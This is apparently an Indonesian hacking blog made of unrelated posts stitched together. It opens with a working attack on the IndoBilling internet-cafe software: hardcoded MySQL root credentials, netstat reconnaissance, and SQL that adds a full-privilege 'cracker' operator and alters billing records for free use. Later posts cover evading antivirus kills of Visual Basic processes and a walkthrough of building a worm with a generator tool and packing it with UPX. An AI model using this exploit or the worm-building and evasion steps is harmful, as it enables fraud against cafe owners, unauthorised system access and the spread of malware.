W3LcOmE in MurDeReSS siTe

[x] Apa itu indobilling ?? yaahhh… semacam aplikasi billing untuk warnet. mbolehin kita untuk make komputer abis kita login ke billing server alias komp OP.
Ngerti bahasne po ora dab ???? pokok e kaya gt lah …
[x] Trus permasalahanya apa ???
sebenernya ga rumit2x amat sih mslh nya, cm koneksi nya ke database yang
ngga ke-filter.
[x] Trus untungnya apa cb kl mbaca blog mu sampe abis ???
ya macem-macem. nubah nama warnet nya, alamat warnet nya,
registrasi warnet nya, nama OP nya, bahkan mbuat km bs ngenet
dengan gratis. (yg terakhir jgn dilakuin ya … d0s4 !! kan rejekinya udh ada
sendiri-sendiri)
[x] Emang caranya gmn c ???
manfaatin aj SQL Manager. eg. SQLyog.
[x] Trus user name sama passwordnya apa ??? kan butuh itu biar bs konek.
Tar deh gmpng.
[x] IP nya tau dr mn ??
ya liat aja pake netstat.
[x] Oww … gt ya … menarik jg nih. Jelasin dong !!!

kay …. pertama kali kita mesti tau IP nya server. dr mn kita tau ???
pake netstat aj.

caranya ::
buat file “netstat.bat” yang isinya berikut ini

============== NETSTAT.BAT ============= [don't copy paste this line]
netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don't copy paste this line]

fungsi dari perintah ini adalah mencetak hasil dari “netstat” ke dalam sebuah file netstat.txt lalu membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.

contoh ::

========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================

keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.

Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet disini <a href=”http://www.webyog.com/downloads/SQLyog604.exe”>Download SQLyog</a>.

/*mlm ni masih lumayan ad temennya, nge-blog bareng ‘eross fyuuhhh … tetep ngantuk jg.
(cukup ….kelamaan banget kata sambutan nya !!! ini bukan upacara bendera bung !!! )*/

kemaren udh sampe di bahasan “mengetahui IP Billing Server”, sekarang mulai untuk konek ke DB mySQL nya server.
yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server, yang msh jd pertanyaan adalah “password & username” nya apa ???

==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================

[x]nah lo … tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit nya ???
yaahh… sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya …

hmmm…. udh deh, kunci udh ditangan, tinggal eksekusi aj.
[x]eksekusi dari hongkong !!!! jelasin dong caranya !!!!!!
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja.
kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa ngubah semua hal yang berhubungan dengan indobilling pada table “warnet”.
misalnya kita pengen nambahin operator di billing server dengan username “cracker” dan password “cracker” yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa dengan menjalankan SQL command berikut ini :

============================================= [don't copy paste this line]
insert into operator (op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values (22,’cracker’,password(‘cracker’),’intruder’,'true’,'true’,'true’,'true’,'true’,'true’,'true’,'Y’,'Y’,'Y’,'Y’,'Y’,'Y’,'Y’)
============================================= [don't copy paste this line]

nahhh …. gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = ‘yyyy-mm-dd hh:mm:ss’
-> format st_name = ‘nama username’
-> st_id = ‘nomor KBU’
yang perlu diinget adalah nilai “st_start” harus waktu saat pengupdatean DB dilakuin. bisa juga dengan make fungsi SQL yaitu curdate() dan curdate().

============================================= [don't copy paste this line]
update station set st_start=’2007-07-01 20:30:30′,st_name=’invisible_theater’, st_duration=’00:01:00′ where st_id=’1′
============================================= [don't copy paste this line]

dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.

============================================= [don't copy paste this line]
update station set st_start=concat(curdate(),’ ‘,curtime()),st_name=’invisible_theater’, st_duration=’00:01:00′ where st_id=’1′
============================================= [don't copy paste this line]

kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh implementasi aj dab.

[x]hmmm…. boleh-boleh ………. trus kq bisa ya ??? ada apa c sebenernya??
yahhh sebenernya cm masalah setting doang, IP address yang bukan localhost diperbolehkan untuk connect langsung ke database dan melakukan edit. too simple right ?

kira-kira gitu deh … silakan di uprek sendiri dengan kreatifitas sendiri ya …

Kita ketahui semenjak munculnya worm-worm seperti kangen, brontok, pesin dan teman-temannya yg dibuat dng bahasa Visual Basic (VB). Maka, banyak pembuat Anti Virus (AV) terutama yg lokal mencari inti dari aplikasi VB ini. Soalnya, hampir puluhan worm lahir setiap minggunya dng menggunakan pemrograman VB ini. So, nggak mungkin dong harus melanglang buana untuk menjadi pemburu worm untuk di bedah dan dijadikan pengenal pada AV. Selain lama, juga banyak user yg kurang mengerti worm, jadi susah mendapatkan sampelnya dari user yg telah menjadi korban.

Untuk itu programmer-programmer AV berlomba-lomba mempercanggih AV nya. Salah satunya membuat mesin pembunuh aplikasi VB yg terfokus pada runtime utama yaitu “MSVBVM60.DLL”. Hiks, pada awalnya sih sangat berguna sekali fungsi ini. Semua worm-worm bahkan versi terbaru sekalipun akan dibabat abis tanpa ampun!!. Tetapi, resiko akhirnya diambil oleh para programmer VB yg memang tidak membuat aplikasi untuk membuat worm. Aplikasi General Ledger (GL) yg dibuat dng VB juga ikut dibasmi. Hasilnya? bisa diketahui sendiri. Ini namanya pemusnahan massal!! Nggak musuh.. nggak tahanan.. dibabat habis.. MAu menyelamatkan.. eh malah merugikan.. we..kuwek.kuwek..kuwek. Ini bukan solusi yg tepat tentunya, makanya Anti-Indovir AntiVirus (promosi dikit :p) nggak menggunakan mesin pembunuh itu dalam prosedurnya.

Tetapi para programmer-programmer VB untuk saat ini jng khawatir terutama Bapak Achmad Darmal yg bukunya belum kelar-kelar hingga saat ini lantaran harus putar otak lagi untuk mengatasi hal ini. Maka untuk itu, saya datang membantu saudara (kata-kata yg sering diucapkan orang yg ada maunya). Kita akan membuat/mengakali dng beberapa trik agar aplikasi yg kita buat dng VB aman dari serangan demikian. Untuk itu buatlah form dng tampilan seperti dibawah ini. Ingat!! property “name” jng diubah biarkan default.

Compile project VB tsb. Agar se-alur dng artikel ini, silahkan namakan dng “antikill.exe”. Lalu jalankan aplikasi tsb. Dalam proses compile yg pertama kita tidak memasukkan kode apapun. Kita akan mencoba men-kill nya dng salah satu engine dari aplikasi AV yg bernama Ansav. Mengapa saya menggunaka Ansav? karena saya ingin membuktikan masing-masing artikel yg menguak tentang cara membunuh aplikasi VB dan Ansav salah satu aplikasi yg dibuat oleh masing pembuat artikel tsb. Download ansav di www.ansav.com lalu jalankan plugins “Process Image Finder”, lalu tekan tombol “Kill VB Process”. Lihat gambar.

Apa yg terjadi? huiihhhh… aplikasi VB yg kita compilasi tsb ditutup hanya dng hitungan mili detik!!! wew… hebat jg plugins si ansav ini!!. Tapi jng patah semangat dulu. Untuk mengatasi hal ini kamu bisa membaca artikelnya mas Ahmad Darmal => http://www.jasakom.com/article.aspx?ID=902. Untuk itu, copykan file “MSVBVM60.DLL” yg ada di direktori system windows (C:\WINDOWS\system32\msvbvm60.dll – WinXP) ke lokasi yg sama dengan file compilasi project kita yaitu “antikill.exe”. Lalu namakan file runtime vb tsb dari “MSVBVM60.DLL” menjadi “ROGATMAN.DLL” (promosi nama :p). Agar aplikasi VB yg kita buat mengenal runtime VB yg telah diubah namanya. Maka kita harus memberitahunya dng mengubah string utama pd badan aplikasi kita. Untuk itu, bukalah file “antikill.exe” dng HexaEditor kesukaan kamu. Saya menggunakan UltraEdit. Lalu ubah string yg berbau “MSVBVM60″ tanpa terkecuali menjadi “ROGATMAN”. Lihat Gambar berikut.

Lalu simpan file tsb. Dan jalankan kembali “antikill.exe”. Coba lakukan kill menggunakan plugins Ansav tsb. Apa yg terjadi? Cihuuiii… aplikasi nggak ke tutup!!! Wah, berhasil juga metode ini.

Selanjutnya kita mencoba dng VB Killer yg lainnya. Salah satunya metode yg digunakan oleh fokerlab dlm artikelnya di http://www.jasakom.com/article.aspx?ID=907. Untuk itu langsung saja download aplikasi jadinya di http://www.geocities.com/foker_rpg_m4//file/gasak.zip. Aplikasi itu merupakan buatan dari pembuat metode tsb. Kita langsung saja menguji ketangguhannya. Untuk itu jalankan file executablenya. Saat artikel ini ditulis nama filenya “Gasak.exe”. Maka akan muncul tampilan kira-kira sbg berikut:

Untuk mencoba membunuh semua aplikasi VB maka, pilih menu “Destroy All Visual Basic Application” seperti yg terlihat pada gambar. Huuaaaahhh.. hebat!!! ternyata tool ini mampu meng-kill aplikasi kita.. hiks.. Tapi tunggu dulu, karena si penulisnya membuka rahasia tentang metode yg digunakan. Maka, dng mudah kita bisa mengakalinya. bagaimana caranya? Masih sama dng metode penagkisan yg pertama yg ditulis oleh Bpk. Darmal. Tetapi target file yg kita bedah bukan file “antikill.exe” melainkan runtime VB yg telah kita ubah namanya sebelumnya yaitu “ROGATMAN.DLL”. Untuk itu, buka “ROGATMAN.DLL” dng Hexa Editor, ubah semua string yg mengandung kata “Thunder” menjadi “Tomeror” (Tomeror = Tomero lagi error.. xi..xi..xi..)

Seperti biasa simpan kembali hasil bedah kita. Selanjutnya, jalankan “Gasak.exe” lakukan kembali uji coba untuk membunuh aplikasi percobaan kita. Apa yg terjadi? bruuakakakakkaa.. berhasil lagi.. berhasil lagi.. hip..hip..hureee… jd ceria nih… setelah menekan tombol menu “Destroy All Visual Basic Application”. Aplikasi kita tetep jalan tanpa tertutup sama sekali. Malahan, tool ini menginformasikan tidak ada aplikasi VB yg aktif. Mudah sekali ternyata!!

Well, so far… tantangan terakhir muncul lagi, huiihhhh… dng hadirnya artikel dari Bpk. anvie yg mengulas tentang teknik ampuh memberantas aplikasi VB (http://www.jasakom.com/article.aspx?ID=913). Dan tidak tanggung-tanggung si Bapak mengungkapkan cara ini sangat ampuh dan dia meyakininya hingga 100 %!! Well, saya jadi takut… soalnya saya cinta Visual Basic..apalagi yg mendeklarasikan ini disebut-sebut sbg master.. hiks…mampuslah saya sbg programmer VB.. kaing..kaing.. nggak lakulah ntar projectku… huuhh.. dari pada menangisi mendingan kita lihat cara apakah itu? Langsung aja download source code yg dibuat dng bahasa C++, serta juga terdapat file executablenya di http://rapidshare.com/files/42777848/AVBKiller.rar.html. Setelah download, extract filenya lalu jalankan file executablenya. Kamu bisa melihatnya dng jelas karena iconnya yg berwarna hitam. Iconnya saja udah hitam.. uuhhhh.. menakutkan!!! Tidak..tidak saya cuma bercanda. Itu cuma default icon untuk aplikasi executable yg tidak dimuat iconnya. Oke, jalankan file itu. Nama filenya “AVBKiller.exe”. Dug..dug..dig..dug.. jantungkupun berdebar-debar. Mungkin kalau aplikasiku itu punya nyawa mungkin dia jg sedang berdebar-debar dan ketakutan… dia sedang menghadapi ajal yg menakutkan….hiks.. saya jadi kasihan.. maaf, yah aplikasiku… saya jadi membuat kamu menjadi kelinci percobaan!! Tapi, tenang ajah ini demi kebaikan keturunanmu juga. Mati 1 Tumbuh 1000.. hip..hip..hureee…

Setelah dijalankan akan tampak tampilan sbg berikut:

Disitu ada beberapa mode yg dikukuhkan oleh pembuatnya. Saya kurang mengerti mode-mode itu. Dari nama-namanya terlihat jelas bahwa pembuatnya seorang pakar IT. Saya tidak mau ambil pusing, saya coba test dng mode yg pertama. Untuk itu saya masukkan angka “1″, lalu saya tekan enter. Apa yg terjadi?? Wew, aman!!! huehueheue.. kamu selamat aplikasiku… cek..cek..cek.. Lalu, ajalankan lagi aplikasi vb killer tsb. Kita akan mencoba mode yg ke 2. Untuk itu amasukkan nilai “2″, dan kembali tekan enter. Lalu, bagaimana? Auhh… semua aplikasi VB mampus.. termasuk tool yg dibuat di fokerlab “Gasak.exe”.. xi..xi..xi.. Jeruk kok makan jeruk… metode makan tuan!! wekekekek… So, bagaimana dong kalau gitu? Saya tidak bisa bahasa C++ dan saya malas mempelajarinya. Saya ingin mengetahui algoritmanya, aduh gimana dung…

Tapi, tidak tau ntah malaikat dari mana yg berbisik pada hati kecilku dan memunculkan ide ini. Sebenarnya sih ide ini memiliki asal usul datangnya. Cuma lantaran saya bukan orang IT dan takut salah menggunakan bahasa. Maka lebih baik saya menunjukkan langsung kodenya. Kode ini saya buat 20 menit setelah megetahui artikel yg dituangkan oleh Bapak anvie yg membuat saya ketakutan. Dng kode ini pada aplikasi anda. Bisa dipastikan aplikasi anda aman 100% dari ancaman VBKiller untuk saat ini. Ingat!! hanya untuk saat ini. Karena saya telah membongkar rahasianya. Seperti kata Bapak anvie, tidak ada gading yg tak retak. Maka, mungkin saat ini orang-orang sudah merancang coding yg baik untuk memngatasi permasalahan tsb lebih jauh lagi. Oke, langsung saja ke coding, ketikkan code VB ini ke Form Code. Dalam contoh ini pada Form1.

‘===================== MULAI DISINI ===========================’

‘Anti-VBKiller Method v.19.07.2007 <= pake versi juga, soalnya bakalan bisa dikiller dilain waktu

‘C0DeR Tomero

Private Sub Command1_Click()
Call TentangKu
End Sub

Private Sub Command2_Click()
Unload Me
End Sub

Private Sub Form_Load()
Name App.Path & “\ROGATMAN.DLL” As App.Path & “\ROGATMAN.TXT”
Open App.Path & “\ROGATMAN.DLL” For Output As #1
Print #1, “HANYA SEBUAH TIPUAN FILE” & vbCrLf & “NGGAK KENAK-NGGAK KENAK”
Close #1
End Sub

Private Sub Form_Unload(Cancel As Integer)
Kill App.Path & “\ROGATMAN.DLL”
While Dir$(App.Path & “\ROGATMAN.DLL”) “”
DoEvents
Wend
Name App.Path & “\ROGATMAN.TXT” As App.Path & “\ROGATMAN.DLL”
End Sub

Private Sub TentangKu()
MsgBox “Hello, saya Tomero… Ini AntiVbKiller Lho?!”, vbInformation, “Cium Aku”
End Sub

‘===================== AKHIR PENULISAN ===========================’

Oke, simpan project tsb. Lalu, compile. Dan namakan kembali dng “antikill.exe”. Lakukan lagi pembedahan seperti langkah-langkah sebelumnya. Karena kita meng-compilasi project baru, supaya tidak ter-kill dng metode-metode kill VB yang sebelumnya. Setelah melakukan pembedahan untuk menangkis kill VB yg diguanakn oleh plugin ansav dan toolnya fokelab yg bernama gasak. Maka, jalankan “antikill.exe”, karena dia sudah siap bertempur melawan kill vb terakhir. Untuk itu jalankan kembali VBKillernya anvie. Lakukan dng mode yg ke “2″ pada selection. Karena percobaan terakhir aplikasi kita yg pertama gagal bertempur pada mode ini. Dan.. binggoo… what up dude? kok, VB gw nggak ke kill. Wow.. mungkin dia udah pake baju anti-peluru kali berlapis 3.. wekekkekke.. bcanda. Liatlah, apa yg dihasilkan oleh VBKiller ini.

Dalam percobaan ini saya juga menjalankan aplikasi “Gasak.exe”. Dan ternyata, file “Gasak.exe” yg dibuat dng VB tewas!! Sedangkan, aplikasi kita aman tentram dengan senyum manis dan ciuman hangatnya. Bruakakkakakka…

Oke, akhirnya kelar juga. Sebenarnya tidak ada yg istimewa dari kode yg saya tuliskan diatas. Mungkin anda pasti tertawa terbahak-bahak, ternyata dng kode yg se-sederhana itu mampu melakukannya. Yuppz.. apalagi dibuat dng VB, makin tertawalah anda.. bruakakakakak.. Nagapain nyari sulit kalau outputnya dikit tapi carilah jalan termudah untuk hari yg cerah.

Terakhir, sebelum saya menutup artikel ini. Saya mau ngucapin terima kasih kepada saudara saya Tunggul, Torkis, Torang, Tumpal, Timbul, Trendy Tampubolon dan kepada Ibu saya R. Simatupang atas dukungan semangatnya. Temen-temenku di medan heang, ucok, lagon, bolang, pahut, moses, butet, erniw, pidong, amani_asu, pukimak, gang_studi_41, martoli_jonjong, SevenBrother, babami, ihurmu, dll. Juga tidak lupa teman-teman cyber saya yg mendukung situs Ninja-Ceria yaitu YunYun, WhiteMed0, odosh, Aut0nuX, C4h_Nd3s1t, Heru Prasetyo, Bpk. Cakra dan semua member Ninja Ceria (www.ninja-ceria.tk). Lalu buat temen-temen chatting si ^family_code^, anonymously_hack, bang dedi (indohacking) yg sibuk dng proyek ITnya di batu raja, anvie yg sibuk dng anti-virus dan komunitasnya (sorri gw pakek soft lho but percobaan…), sama juga untuk fokerlab jg maaf, yah saya pake toolnya buat coba-coba.. dan terakhir untuk Jasakom terutama Bpk. S’to dan Bpk. Darmal atas dng ini saya gunakan beberapa artikel dari jasakom sbg acuan, saya ucapkan terima kasih banyak. GBU…

Tulisan ini dibuat untuk para newbie yang ingin tahu, dan mencoba sesuatu hal yang baru dan cukup menyenangkan dan mengasikan (bagi saya) …he..he…:)
Oke, tanpa banyak cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan kita ciptakan, siap….????? Oke kita mulai…..
Oooopppss…. Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw…. J )

Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM (Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya….).Oh ya Program ini bisa didownload gratis di: http://www.spyrozone.net di menu Vir&Worm + Removal.

Oke dech langsung aj kali ye… bis cape ngomong terus dari tadi ga mulai-mulai neh…J Tapi sebelum kita memulai membuat ‘Black Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing:

1. Sebuah gelas yang berisi air panas lengkap dengan sendoknya.
2. Satu sachet cappuccino rasa apa saja yang belum kadaluwarsa, klo ini bisa didownload di warung terdekat… J)
3. Cemilan, kalo bisa yang enak dan ga mengandung lemak.
4. Hati, Pikiran dan niat yang tulus dan ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja dikomputer sendiri (sejenis senjata makan tuan gtu…. J)

Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. Hasilnya seperti gambar dibawah ini.

Tampilan VB+Vimaker32 RC 03 :

Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gtu… J,

Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he… J

Berikut tampilan Registry Action Selector :

Window Caption Selector

Jangan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe)

File virus hasil compile :

File hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker J Semoga artikel ini bermanfaat dan sungguh tak ada niat dari penulis sedikitpun untuk memotivasi agar membuat virus dengan tool ini, tujuan penulis tidak lain hanya berbagi informasi dan pengetahuan dan penulis tidak bertanggung jawab atas segala resiko apapun yang terjadi akibat dari penyalahgunaan artikel ini. Dan penulis ucapkan terima kasih kepada jasakom yang telah bersedia mempublish artikel ini.

Sebenarnya, aplikasi Visual Basic dapat diketahui dengan banyak cara, sebagian contohnya adalah :

1.) Jika aplikasi VB tsb, masih ting-ting artinya belum di-ttuuuutt(di kompress maksudnya), maka dapat dicari headernya. Karena header file VB berbeda dengan file lain. Kalo udah dikompress udah lain ceritanya.

2.) Melalui Handlenya yaitu msvbvm*0.dll. Namun apakah jika pada badan aplikasi VB tsb karakter msvbvm* 0.dll sudah diganti akan aman dari KillVB? (coba lihat http://www.jasakom.com/article.aspx?ID=902 yg ditulis oleh mas Achmad Darmal) Jawabannya mudah sekali “Ya”, karena KillVB hanya mencari process yg berjalan dengan MSVBVM*, apalagi jika ditambahi dengan mengkompressi terhadap filenya, sehingga walaupun aplikasi tsb dilihat melalui notepad atau sejenisnya tidak akan terlihat handle MSVBVM* 0.DLL yg telah diganti.

Dengan demikian mungkin para pembuat virus sudah mempersiapkan virusnya dengan cara tsb agar tidak bisa diKill dgan KillVB.

Lalu bagaimana cara menutup aplikasi VB tsb? Mudah aja, kmaren aku udah mbuat cara yg bisa dibilang sangat sederhana, aku buat cara ini buat jaga-jaga aja. Begini caranya :

Perlu diketahui, salah satu hal yang menyamakan aplikasi VB adalah “ThunderRT*Main”, ya… itu adalah classname dari Focus aplikasi VB. Mungkin sampai disini sudah cukup jelas.

Lalu bagaimana untuk mengambil semua aplikasi VB tsb? Mudah aja, jika process bisa di-Enumerate maka kita Enumerate saja semua window yang ada menggunakan code ini:

—————————————————————————————————–

Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Declare Function GetWindowTextLength Lib “user32″ Alias “GetWindowTextLengthA” (ByVal hwnd As Long) As Long

Function EnumAllWindows(ByVal TgtHwnd As Long, ByVal Paramatre As Long) As Boolean

Dim Buff As String, Win As Long

Win = GetWindowTextLength(TgtHwnd)

‘//Handlenya jadiin string

Buff = Space(Win)

‘//Mencari text/caption window secara bertahap

GetWindowText TgtHwnd, Buff, Win + 1

‘//Masukan text/caption window tsb pada listbox

listbox.AddItem Buff

‘//Kasih nilai TRUE

EnumAllWindows = True

End Function

—————————————————————————————————–

Lalu untuk memanggil fungsi diatas kita akan menggunakan code ini :

—————————————————————————————————–

EnumWindows AddressOf EnumAllWindows, ByVal 0&

—————————————————————————————————–

Dengan cara diatas maka semua window akan dimasukkan dalam listbox,

selanjutnya dari text/caption window yg udah kita masukkan pada listbox, kita akan cari classnamenya. Jika ada window yang positif classnamenya adalah “ThunderRT*Main” maka tutup aplikasi tsb.

Mungkin ada pertanyaan “Mengapa tidak memakai classname ‘ThunderRT6FormDC’?”

Jawabannya mudah, karena Focus dari aplikasi VB itu selalu mempunyai nama, tidak seperti form yang bisa diberi nama atau tidak. Dengan demikian akan mempermudah dalam mencari windownya karena telah ada spesifikasi nama.

Lalu untuk menutup aplikasi VB tersebut, kita akan gunakan code ini :

—————————————————————————————————–

‘//Pertama cari windownya dulu dari dumpernya (sebuah List)

HandleTarget=FindWindow(“ThunderRT[*]Main”,List.list(i))

‘//Lalu berikan message pada window yang didapat

PostMessage HandleTarget, WM_NCDESTROY Or WM_DESTROY, 0&, 0&

—————————————————————————————————–

Dan jiika kamu ingin memodifikasi code diatas, ingat jangan pernah gunakan parameter WM_CLOSE (yg nilainya &H10) pada fungsi PostMessage, karena jika aplikasi VB itu menggunakan code ini

—————————————————————————————————–

Private Sub Form_Unload(Cancel As Integer)

Shell App.Path & “\” & App.EXEName & “.[Extensi]“, [Paramater]

End Sub

—————————————————————————————————–

Maka akan muncul window baru, karena constanta WM_CLOSE = & H10 sama dengan fungsi Unload pada form.

Sederhana sekalikan. Utk lebih jelasnya donlot sourcecodenya di www.geocities.com/foker_rpg_m4/download/dudut.zip

Ato utk tool yg lebih lengkap ada di www.geocities.com/foker_rpg_m4/download/gasak.zip (Utk menutup process VB seperti KillVB tekan ‘Alt+Backspace’, utk menutup Applikasi sperti cara diatas tekan ‘Shift+Del ‘)

Tapi yang masih menjadi masalah adalah “Masa’ VB makan VB? Halal ga’ ya?” Haghaghag…..

Nb :

Perhatian character [*] diganti sesuai versi dari versi Visual Basic yang digunakan.

Dalam membangun sebuah sistem jaringan berbasis internet, masalah keamanan menjadi suatu hal yang mutlak diperlukan. Sistem yang dibangun tanpa adanya sistem keamanan yang baik sama halnya dengan mengajak pencuri untuk masuk ke rumah kita dan membiarkan dia mengambil segala sesuatu yang kita miliki.

Seringkali ketika membangun sebuah sistem, kita menemukan berbagai kerawanan dalam sistem kita. Namun hal itu kita anggap sebagai hal kecil karena kita tidak menganggapnya sebagai lubang keamanan (hole). Kita tidak sadar bahwa kerawanan-kerawanan kecil seperti inilah yang dimanfaatkan oleh orang-orang yang tidak bertanggungjawab untuk menjalankan aksi kejahatannya.

HACKER VS CRACKER

Dua istilah ini paling sering disebutkan ketika kita berbicara mengenai keamanan data. Hacker dan cracker dianggap sebagai orang yang bertanggung jawab atas berbagai kasus kejahatan komputer (cybercrime) yang semakin marak dewasa ini. Padahal jika kita mau melihat siapa dan apa yang dilakukan oleh hacker dan cracker, maka anggapan tersebut bisa dikatakan tidak 100 % benar.

Hacker adalah sebutan untuk mereka yang menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Hasil pekerjaan mereka biasanya dipublikasikan secara luas dengan harapan sistem atau software yang didapati memiliki kelemahan dalam hal keamanan dapat disempurnakan di masa yang akan datang. Sedangkan cracker memanfaatkan kelemahan-kelamahan pada sebuah sistem atau software untuk melakukan tindak kejahatan.

Dalam masyarakat hacker, dikenal hirarki atau tingkatan. Hacker menduduki tempat kedua dalam tingkatan tersebut dan cracker berada pada tingkat ketiga. Selain itu masih ada beberapa tingkatan lain seperti lamer (wanna be). Berbeda dengan hacker dan craker yang mencari dan menemukan sendiri kelemahan sebuah sistem, seorang lamer menggunakan hasil temuan itu untuk melakukan tindak kejahatan. Seorang lamer biasanya hanya memiliki pengetahuan yang sedikit mengenai komputer terutama mengenai sistem keamanan dan pemrograman. Dalam komunitas hacker, lamer merupakan sebutan yang bisa dibilang memalukan.

Seorang hacker memiliki tujuan yaitu untuk menyempurnakan sebuah sistem sedangkan seorang cracker lebih bersifat destruktif. Umumnya cracker melakukan cracking untuk menggunakan sumber daya di sebuah sistem untuk kepentingan sendiri.

MENGUJI KEAMANAN SISTEM

Berbicara mengenai keamanan dalam sebuah sistem komputer, tak akan lepas dari bagaimana seorang cracker dapat melakukan penetrasi ke dalam sistem dan melakukan pengrusakan. Ada banyak cara yang biasanya digunakan untuk melakukan penetrasi antara lain : IP Spoofing (Pemalsuan alamat IP), FTP Attack, Unix Finger Exploit, Flooding, Email Exploitsm Password Attacks, Remote File Sisem Attacks, dll.

Pada umumnya, cara-cara tersebut bertujuan untuk membuat server dalam sebuah sistem menjadi sangat sibuk dan bekerja di atas batas kemampuannya sehingga sistem akan menjadi lemah dan mudah dicrack.

